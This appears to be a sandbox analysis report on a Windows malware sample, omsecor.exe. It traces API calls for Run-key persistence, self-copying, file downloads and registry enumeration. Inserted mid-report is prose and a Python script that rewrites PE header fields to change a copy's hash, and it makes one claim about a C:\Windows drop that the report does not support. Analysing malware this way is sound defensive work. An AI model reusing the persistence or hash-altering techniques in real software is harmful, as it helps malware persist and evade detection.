                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 00000004.00000002.1663507397.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.1663486120.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663507397.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 00000004.00000002.1663565291.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Execution Graph

                          Execution Coverage:7.1%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1147
                          Total number of Limit Nodes:5
6553 4091eb SysFreeString 6553->6443 6554->6553 6555 40c5d0 __VEC_memcpy 6554->6555 6555->6553 6558 40809e __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 6556->6558 6557 408212 6557->6459 6558->6557 6560 407f4f 6558->6560 6562 407f5c 6560->6562 6561 407f71 6561->6558 6562->6561 6563 4072ed 3 API calls 6562->6563 6563->6561 6565 409314 6564->6565 6566 40933b CharLowerW 6565->6566 6570 409364 6565->6570 6574 4088de SysFreeString SysFreeString 6565->6574 6567 409351 6566->6567 6568 409362 SysFreeString 6567->6568 6569 409359 SysFreeString 6567->6569 6568->6570 6569->6574 6571 4093ae SysAllocString SysAllocString 6570->6571 6570->6574 6572 4093d7 SysFreeString SysFreeString 6571->6572 6572->6574 6574->6470 6576 408cd2 6575->6576 6577 408f17 VariantClear 6576->6577 6578 408e8f 6576->6578 6579 408cd6 6576->6579 6581 408e6d SysFreeString 6576->6581 6582 408e76 VariantClear 6576->6582 6583 408e2c SysFreeString 6576->6583 6585 409581 6576->6585 6577->6579 6578->6579 6580 408ed5 SysAllocString 6578->6580 6579->6502 6580->6579 6581->6582 6582->6576 6582->6578 6583->6576 6586 409591 6585->6586 6587 409595 6586->6587 6588 409599 CharLowerW 6586->6588 6587->6576 6589 4095fb 6588->6589 6591 4095b3 6588->6591 6590 40960a SysFreeString 6589->6590 6590->6576 6591->6589 6591->6590 6592 4095d5 CharLowerW 6591->6592 6593 4095df 6592->6593 6594 409605 SysFreeString 6593->6594 6594->6590 6964 403e18 6965 40821c PathCombineW 6964->6965 6966 403e3d 6965->6966 6967 403e87 6966->6967 6968 403e4c 6966->6968 6969 403e8f 6966->6969 6971 408248 8 API calls 6968->6971 6970 40c519 4 API calls 6969->6970 6973 403e9c 6970->6973 6971->6967 6972 40c5b9 SysFreeString 6972->6973 6973->6967 6973->6972 6974 40c43d 4 API calls 6973->6974 6975 40c00b 3 API calls 6973->6975 6976 40be3a HeapFree 6973->6976 6974->6973 6975->6973 6976->6973 6977 409a99 6978 409aa6 6977->6978 6979 409723 __VEC_memcpy 6978->6979 6980 409ac4 6979->6980 6981 409b18 6980->6981 6982 409723 __VEC_memcpy 6980->6982 6983 409ae9 
6982->6983 6983->6981 6984 409af2 SysAllocString SysAllocString 6983->6984 6984->6981 6985 409f99 Sleep 6986 409fa7 6985->6986 6595 402c62 6604 406c77 RegOpenKeyExW 6595->6604 6597 402c77 6598 406cb5 GetVersionExW 6597->6598 6599 402c7c 6598->6599 6600 40a8f9 34 API calls 6599->6600 6601 402c8f 6600->6601 6602 40267a 122 API calls 6601->6602 6603 402ca8 6602->6603 6605 406c9b 6604->6605 6606 406c9f 6604->6606 6605->6597 6609 4069c0 RegQueryValueExW RegCloseKey 6606->6609 6608 406cb0 6608->6597 6609->6608 6987 40d2a4 6988 40d2ac 6987->6988 6989 40d378 __except_handler3 6988->6989 6993 40d790 6988->6993 6992 40d2e5 __except_handler3 _CallDestructExceptionObject @_EH4_CallFilterFunc@8 6992->6989 6999 40d110 RtlUnwind 6992->6999 6997 40d7e5 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6993->6997 6998 40d7d1 _ValidateScopeTableHandlers _CallDestructExceptionObject __FindPESection 6993->6998 6994 40d99d VirtualQuery 6995 40d9b2 6994->6995 6994->6998 6996 40d9cc GetVersionExA 6995->6996 6995->6998 6996->6998 6997->6994 6997->6998 6998->6992 7000 40d128 6999->7000 7000->6992 6610 4053ea HeapCreate 6611 405408 GetProcessHeap 6610->6611 6612 40541c 6610->6612 6611->6612 6629 403740 6612->6629 6630 40375a 6629->6630 6746 40848f RegOpenKeyExW 6630->6746 6633 4037a2 ExpandEnvironmentStringsW 6756 4034a8 6633->6756 6634 403846 6638 40be3a HeapFree 6634->6638 6635 40383c 6760 4033a0 6635->6760 6639 403844 6638->6639 6644 403c10 6639->6644 6640 4037f6 SHGetFolderPathW 6641 4037c3 6640->6641 6641->6640 6642 403837 6641->6642 6643 408248 8 API calls 6641->6643 6642->6634 6642->6635 6643->6641 6645 403c29 6644->6645 6646 40848f 7 API calls 6645->6646 6647 403c6d 6646->6647 6648 403c79 ExpandEnvironmentStringsW 6647->6648 6657 403ca9 6647->6657 6774 4039ea HeapAlloc 6648->6774 6650 403e00 6653 4033a0 HeapFree 6650->6653 6651 403e0a 6654 40be3a HeapFree 6651->6654 6655 403e08 6653->6655 6654->6655 6666 4040e7 6655->6666 6656 403d18 SHGetFolderPathW 
6656->6657 6657->6656 6659 408248 8 API calls 6657->6659 6660 403d88 6657->6660 6663 403df7 6657->6663 6791 4039a3 6657->6791 6659->6657 6661 40848f 7 API calls 6660->6661 6660->6663 6662 403dc8 6661->6662 6662->6663 6664 403dd4 ExpandEnvironmentStringsW 6662->6664 6663->6650 6663->6651 6665 4039a3 8 API calls 6664->6665 6665->6663 6670 404100 6666->6670 6667 40412c SHGetFolderPathW 6667->6670 6668 408248 8 API calls 6668->6670 6669 40416d 6671 404172 6669->6671 6672 40417c 6669->6672 6670->6667 6670->6668 6670->6669 6673 4033a0 HeapFree 6671->6673 6674 40be3a HeapFree 6672->6674 6675 40417a 6673->6675 6674->6675 6676 4041e4 HeapAlloc 6675->6676 6687 404453 6676->6687 6691 404212 6676->6691 6677 4042a0 RegOpenKeyExW 6677->6691 6678 40443d 6680 40be3a HeapFree 6678->6680 6679 40440f RegEnumKeyExW 6681 404427 RegCloseKey 6679->6681 6679->6691 6682 404445 6680->6682 6681->6691 6683 404455 6682->6683 6684 40444b 6682->6684 6686 40be3a HeapFree 6683->6686 6685 4033a0 HeapFree 6684->6685 6685->6687 6686->6687 6694 40451b 6687->6694 6688 40848f 7 API calls 6688->6691 6689 40435e RegOpenKeyExW 6689->6691 6690 40845d 2 API calls 6690->6691 6691->6677 6691->6678 6691->6679 6691->6688 6691->6689 6691->6690 6692 40c3f9 wvnsprintfW 6691->6692 6693 40c00b 3 API calls 6691->6693 6692->6691 6693->6691 6795 40be9d 6694->6795 6696 404535 HeapAlloc 6697 404786 6696->6697 6708 404555 6696->6708 6698 404796 6697->6698 6699 40478c 6697->6699 6701 40be3a HeapFree 6698->6701 6700 4033a0 HeapFree 6699->6700 6702 404794 6700->6702 6701->6702 6714 404a92 6702->6714 6703 4045c5 RegOpenKeyExW 6704 4045e8 RegEnumKeyExW 6703->6704 6703->6708 6704->6708 6705 404780 6707 40be3a HeapFree 6705->6707 6706 40476a RegCloseKey 6706->6708 6707->6697 6708->6703 6708->6705 6708->6706 6709 40473d RegEnumKeyExW 6708->6709 6710 40848f 7 API calls 6708->6710 6712 40c3f9 wvnsprintfW 6708->6712 6713 40c00b 3 API calls 6708->6713 6796 40854c RegOpenKeyExW 6708->6796 6709->6708 6710->6708 6712->6708 6713->6708 
6716 404aab 6714->6716 6715 404ad7 SHGetFolderPathW 6715->6716 6716->6715 6717 404b18 6716->6717 6718 408248 8 API calls 6716->6718 6719 404b27 6717->6719 6720 404b1d 6717->6720 6718->6716 6722 40be3a HeapFree 6719->6722 6721 4033a0 HeapFree 6720->6721 6723 404b25 6721->6723 6722->6723 6724 405136 6723->6724 6726 405150 6724->6726 6725 40848f 7 API calls 6725->6726 6726->6725 6727 40520b 6726->6727 6728 4051e0 ExpandEnvironmentStringsW 6726->6728 6729 405211 6727->6729 6730 40521b 6727->6730 6731 404e7b 8 API calls 6728->6731 6732 4033a0 HeapFree 6729->6732 6733 40be3a HeapFree 6730->6733 6731->6726 6734 405219 6732->6734 6733->6734 6735 405229 6734->6735 6736 405238 6735->6736 6737 407b4e 9 API calls 6736->6737 6738 4052e8 6737->6738 6739 406d14 2 API calls 6738->6739 6742 405361 Sleep 6738->6742 6745 405372 6738->6745 6739->6738 6740 40537c Sleep 6740->6745 6742->6738 6743 4053cb Sleep 6743->6745 6744 4053e0 6745->6740 6745->6743 6745->6744 6800 409df4 6745->6800 6747 4084af 6746->6747 6750 4084c5 6746->6750 6764 40845d RegQueryValueExW 6747->6764 6749 403796 6749->6633 6749->6641 6750->6749 6767 40bfd0 6750->6767 6752 408518 6753 40852e 6752->6753 6754 40851f ExpandEnvironmentStringsW 6752->6754 6755 408531 GetProcessHeap HeapFree 6753->6755 6754->6753 6754->6755 6755->6749 6757 4034bc 6756->6757 6758 408248 8 API calls 6757->6758 6759 40350a 6758->6759 6759->6641 6761 4033a4 6760->6761 6762 40be3a HeapFree 6761->6762 6763 4033d7 6762->6763 6763->6639 6765 408482 RegCloseKey 6764->6765 6766 40847f 6764->6766 6765->6750 6766->6765 6768 40bfd7 6767->6768 6769 40bfda 6767->6769 6768->6752 6770 40bff3 6769->6770 6773 40be27 HeapAlloc 6769->6773 6770->6752 6772 40bffa 6772->6752 6773->6772 6775 403a1a GetPrivateProfileStringW 6774->6775 6778 403bb9 PathRemoveFileSpecW 6774->6778 6776 403a36 6775->6776 6787 403baf 6775->6787 6779 403a48 HeapAlloc 6776->6779 6776->6787 6777 40be3a HeapFree 6777->6778 6778->6657 6779->6787 6788 403a64 6779->6788 6780 403ac8 StrStrIW 
6781 403add StrStrIW 6780->6781 6780->6788 6782 403af2 GetPrivateProfileStringW 6781->6782 6781->6788 6783 403b09 GetPrivateProfileStringW 6782->6783 6782->6788 6784 403b26 GetPrivateProfileStringW 6783->6784 6783->6788 6784->6788 6785 403ba9 6786 40be3a HeapFree 6785->6786 6786->6787 6787->6777 6788->6780 6788->6785 6789 40c3f9 wvnsprintfW 6788->6789 6790 40c00b 3 API calls 6788->6790 6789->6788 6790->6788 6792 4039b7 6791->6792 6793 408248 8 API calls 6792->6793 6794 4039e5 6793->6794 6794->6657 6795->6696 6797 40856f 6796->6797 6799 408585 6796->6799 6798 40845d 2 API calls 6797->6798 6798->6799 6799->6708 6801 409e01 6800->6801 6813 40beea 6801->6813 6804 409eb1 HttpOpenRequestW 6805 409ead 6804->6805 6806 409ecf HttpSendRequestW 6804->6806 6805->6745 6808 40be3a HeapFree 6806->6808 6809 409eea 6808->6809 6809->6805 6810 409eef InternetReadFile 6809->6810 6810->6805 6811 409f0c 6810->6811 6821 40bf35 6811->6821 6814 40bef4 6813->6814 6825 40beb4 6814->6825 6817 409e3e InternetConnectW 6817->6804 6817->6805 6819 40bf1c 6819->6817 6820 40beb4 WideCharToMultiByte 6819->6820 6820->6817 6822 40bf3f MultiByteToWideChar 6821->6822 6823 40bf3a 6821->6823 6824 40bf58 6822->6824 6823->6822 6824->6805 6826 40bec3 WideCharToMultiByte 6825->6826 6827 40bebe 6825->6827 6828 40bedd 6826->6828 6827->6826 6828->6817 6829 40be27 HeapAlloc 6828->6829 6829->6819 7007 40d2ac 7008 40d2ca 7007->7008 7011 40d378 __except_handler3 7007->7011 7009 40d790 __except_handler3 2 API calls 7008->7009 7010 40d2e5 __except_handler3 _CallDestructExceptionObject @_EH4_CallFilterFunc@8 7009->7010 7010->7011 7012 40d110 __except_handler3 RtlUnwind 7010->7012 7012->7010 7013 402cad 7014 406c77 3 API calls 7013->7014 7015 402cc3 7014->7015 7016 406cb5 GetVersionExW 7015->7016 7017 402cc8 7016->7017 7018 40a8f9 34 API calls 7017->7018 7019 402cdb 7018->7019 7020 40267a 122 API calls 7019->7020 7021 402d00 7020->7021 7022 409c6f SysFreeString 7021->7022 7023 402d08 7022->7023 7024 4032af ExitProcess 
7029 402c32 7030 40267a 122 API calls 7029->7030 7031 402c56 7030->7031 7032 409c6f SysFreeString 7031->7032 7033 402c5e 7032->7033 6830 402df3 6831 406c77 3 API calls 6830->6831 6832 402e08 6831->6832 6833 406cb5 GetVersionExW 6832->6833 6834 402e0d 6833->6834 6835 40a8f9 34 API calls 6834->6835 6836 402e20 6835->6836 6837 40267a 122 API calls 6836->6837 6838 402e39 6837->6838 7034 4094b6 7035 4094c9 7034->7035 7036 4094cd 7035->7036 7037 4094f3 CharLowerW CharLowerW 7035->7037 7038 4094e3 SysFreeString 7035->7038 7039 409560 7037->7039 7042 409512 7037->7042 7040 40957e 7038->7040 7041 40956f SysFreeString SysFreeString 7039->7041 7041->7040 7042->7039 7042->7041 7043 40953a CharLowerW 7042->7043 7044 409544 7043->7044 7045 40956a SysFreeString 7044->7045 7045->7041 7046 402db7 7047 40267a 122 API calls 7046->7047 7048 402dd1 7047->7048 7049 40183a 7050 401854 7049->7050 7051 408091 3 API calls 7050->7051 7054 401958 7050->7054 7052 40194a 7051->7052 7053 408091 3 API calls 7052->7053 7053->7054 7057 402e3e 7067 402e4d 7057->7067 7058 40327c 7059 402eb7 GetModuleFileNameW 7060 402ed6 GetCurrentDirectoryW 7059->7060 7059->7067 7060->7067 7061 402f2a GetLastError 7062 40a786 35 API calls 7061->7062 7062->7067 7063 403251 GetLastError 7063->7067 7064 403237 GetLastError 7064->7067 7065 40a786 35 API calls 7065->7067 7066 407552 Sleep 7066->7067 7067->7058 7067->7059 7067->7061 7067->7063 7067->7064 7067->7065 7067->7066 7068 40253c 50 API calls 7067->7068 7068->7067 7080 403bbf 7081 40821c PathCombineW 7080->7081 7082 403bdf 7081->7082 7083 403bf9 7082->7083 7084 403bfe 7082->7084 7085 403bee 7082->7085 7087 4039ea 12 API calls 7084->7087 7086 4039a3 8 API calls 7085->7086 7086->7083 7087->7083

                          Control-flow Graph

                          control_flow_graph 305 40abd9-40abf5 call 40ac20 308 40abf7-40ac0c FindFirstFileW 305->308 309 40ac1a 305->309 308->309 310 40ac0e-40ac18 FindClose 308->310 311 40ac1c-40ac1f 309->311 310->311
                          APIs
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • FindFirstFileW.KERNEL32(?,00000000), ref: 0040AC03
                          • FindClose.KERNEL32(00000000), ref: 0040AC0F
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindOpen$CloseFileFirst
                          • String ID:
                          • API String ID: 3155378417-0
                          • Opcode ID: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction ID: fa0310e4c65bbc590993533f650c85f5e3ee77ef27cd51fa1c8f473dbf319076
                          • Opcode Fuzzy Hash: ab3d299b7ad4ae48143099222020c13c56cdbf39ef5f27e8c74799f3a551cc1f
                          • Instruction Fuzzy Hash: 5DE0D87160C7044BE220E7B49D0C967B3DCAB45325F000F36A9B6E20C0FA38D46A465F

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B36C
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B39D
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          • GetLastError.KERNEL32(00000004), ref: 0040B3CA
                          • Sleep.KERNEL32(00002710), ref: 0040B3F7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B413
                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0040B435
                          • ExitProcess.KERNEL32 ref: 0040B44D
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,771B0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                            • Part of subcall function 0040AC20: RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                          • GetLastError.KERNEL32(00000004), ref: 0040B48D
                          • GetLastError.KERNEL32(00000004), ref: 0040B49A
                          • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 0040B4C7
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040B4D7
                          • GetLastError.KERNEL32(00000004), ref: 0040B500
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$ErrorLastModuleName$Open$CopyCreateEnvironmentExitExpandProcessSleepStrings
                          • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$opeqmc.exe
                          • API String ID: 3692109554-477663111
                          • Opcode ID: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction ID: ccf8aad4361994264e72a39918ed7d53ff083e628d4a69ee62a5d407c68d8035
                          • Opcode Fuzzy Hash: a37a2c0829b51652c0125789b7ef107c293a8625708184dc08050438480bf6fc
                          • Instruction Fuzzy Hash: 8C4127719042186AE710B7A19D46FAB73ACEF04345F14447BBB05F11C2EB789A548AAF

                          Control-flow Graph

                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                          • GetFileSize.KERNEL32(?,00000000), ref: 0040762E
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00407638
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040763F
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407660
                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040767F
                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00407691
                          • ReadFile.KERNEL32(?,?,00000040,?,00000000), ref: 004076A1
                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076AF
                          • ReadFile.KERNEL32(?,?,000000F8,?,00000000), ref: 004076C5
                          • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 004076EF
                          • WriteFile.KERNEL32(?,?,000000F8,?,00000000), ref: 00407705
                          • CloseHandle.KERNEL32(?), ref: 00407714
                          • CloseHandle.KERNEL32(?), ref: 00407719
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocateProcessSize
                          • String ID:
                          • API String ID: 2296163861-0
                          • Opcode ID: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                          • Opcode Fuzzy Hash: 894f1e02061cece153af19de11902bbae5fe70548c4ece14d410128547cdf08b
                          • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64
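
The function above copies a file (CreateFileW with GENERIC_READ on the source, GENERIC_READ|GENERIC_WRITE and CREATE_ALWAYS on the destination, ReadFile/WriteFile of the whole buffer) and then reads 0x40 bytes, seeks, reads 0xF8 bytes, seeks again and writes 0xF8 bytes. 0x40 is sizeof(IMAGE_DOS_HEADER) and 0xF8 is sizeof(IMAGE_NT_HEADERS32), so the second read/write pair targets the NT headers at e_lfanew of the copy. The Python below is an added example, not code from the report or from the sample: it parses those two structures from a constructed minimal PE header, rewrites a copy's NT headers the way the listing suggests, and diffs original against copy, which is the check an analyst runs on the dropped executable against the submitted one. Which fields the sample actually changes is not visible in the listing; the demo patches TimeDateStamp and CheckSum as an assumption.

```python
import struct
from typing import Dict, List, Tuple

DOS_HEADER_SIZE = 0x40    # sizeof(IMAGE_DOS_HEADER): the first ReadFile in the listing
NT_HEADERS32_SIZE = 0xF8  # sizeof(IMAGE_NT_HEADERS32) = 4 + 20 + 224: the 0xF8-byte read/write

# Fields an analyst compares first; offsets are relative to the start of IMAGE_NT_HEADERS32.
NT_FIELDS: List[Tuple[str, int, str]] = [
    ("Signature", 0x00, "<I"),
    ("Machine", 0x04, "<H"),
    ("NumberOfSections", 0x06, "<H"),
    ("TimeDateStamp", 0x08, "<I"),
    ("SizeOfOptionalHeader", 0x14, "<H"),
    ("Characteristics", 0x16, "<H"),
    ("Magic", 0x18, "<H"),
    ("AddressOfEntryPoint", 0x28, "<I"),
    ("ImageBase", 0x34, "<I"),
    ("SizeOfImage", 0x50, "<I"),
    ("SizeOfHeaders", 0x54, "<I"),
    ("CheckSum", 0x58, "<I"),
    ("Subsystem", 0x5C, "<H"),
    ("DllCharacteristics", 0x5E, "<H"),
]


def nt_headers_offset(data: bytes) -> int:
    """e_lfanew from the 64-byte DOS header (offset 0x3C)."""
    if len(data) < DOS_HEADER_SIZE or data[:2] != b"MZ":
        raise ValueError("not a DOS/MZ header")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    return e_lfanew


def header_io_plan(data: bytes) -> List[Tuple[int, int]]:
    """(offset, length) pairs the SetFilePointer/ReadFile sequence in the listing corresponds to."""
    return [(0, DOS_HEADER_SIZE), (nt_headers_offset(data), NT_HEADERS32_SIZE)]


def read_nt_headers(data: bytes) -> bytes:
    """The 0xF8-byte IMAGE_NT_HEADERS32 block, validated by its 'PE\\0\\0' signature."""
    off = nt_headers_offset(data)
    hdr = data[off:off + NT_HEADERS32_SIZE]
    if len(hdr) != NT_HEADERS32_SIZE or hdr[:4] != b"PE\0\0":
        raise ValueError("truncated or invalid NT headers")
    return hdr


def parse_nt_headers(hdr: bytes) -> Dict[str, int]:
    return {name: struct.unpack_from(fmt, hdr, off)[0] for name, off, fmt in NT_FIELDS}


def diff_nt_headers(a: bytes, b: bytes) -> List[Tuple[str, int, int]]:
    """Fields that differ between two NT header blocks, as (name, before, after)."""
    fa, fb = parse_nt_headers(a), parse_nt_headers(b)
    return [(n, fa[n], fb[n]) for n, _, _ in NT_FIELDS if fa[n] != fb[n]]


def build_sample_image() -> bytes:
    """Constructed minimal 32-bit PE header (DOS header + NT headers, no sections); demo input only."""
    dos = bytearray(DOS_HEADER_SIZE)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, DOS_HEADER_SIZE)            # e_lfanew: NT headers follow directly
    nt = bytearray(NT_HEADERS32_SIZE)
    nt[:4] = b"PE\0\0"
    struct.pack_into("<HHI", nt, 0x04, 0x014C, 3, 0x5F3E1A2B)     # i386, 3 sections, TimeDateStamp
    struct.pack_into("<HH", nt, 0x14, 0xE0, 0x0102)               # SizeOfOptionalHeader, EXECUTABLE|32BIT
    struct.pack_into("<H", nt, 0x18, 0x010B)                      # PE32 magic
    struct.pack_into("<I", nt, 0x28, 0x1000)                      # AddressOfEntryPoint
    struct.pack_into("<I", nt, 0x34, 0x00400000)                  # ImageBase (matches the dump base above)
    struct.pack_into("<II", nt, 0x50, 0x00010000, 0x400)          # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", nt, 0x58, 0x0001ABCD)                  # CheckSum
    struct.pack_into("<HH", nt, 0x5C, 2, 0x8140)                  # Subsystem GUI, DllCharacteristics
    return bytes(dos) + bytes(nt)


def patch_copy(data: bytes, **fields: int) -> bytes:
    """Emulate 'copy the file, seek to e_lfanew, rewrite 0xF8 bytes' by changing named NT
    header fields in a copy. Assumption: the real sample's choice of fields is not in the listing."""
    out = bytearray(data)
    off = nt_headers_offset(data)
    table = {n: (o, f) for n, o, f in NT_FIELDS}
    for name, value in fields.items():
        o, f = table[name]
        struct.pack_into(f, out, off + o, value)
    return bytes(out)


if __name__ == "__main__":
    original = build_sample_image()
    copy = patch_copy(original, TimeDateStamp=0x60000000, CheckSum=0)
    print("I/O plan:", [(hex(o), hex(n)) for o, n in header_io_plan(original)])
    for name, before, after in diff_nt_headers(read_nt_headers(original), read_nt_headers(copy)):
        print(f"{name}: 0x{before:08X} -> 0x{after:08X}")
```

Run the same diff_nt_headers over the submitted sample and the file dropped under C:\Windows to see which header fields the rewrite touched; a changed TimeDateStamp or CheckSum alone is enough to give every drop a fresh hash, which is why the file-level IOCs in a report like this one should be taken from the unchanged sections rather than the header.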

                          Control-flow Graph

                          APIs
                          • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                          • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                          • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                          • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                          • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                          • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                          • String ID: hOA
                          • API String ID: 1355009786-3485425990
                          • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                          • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                          • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
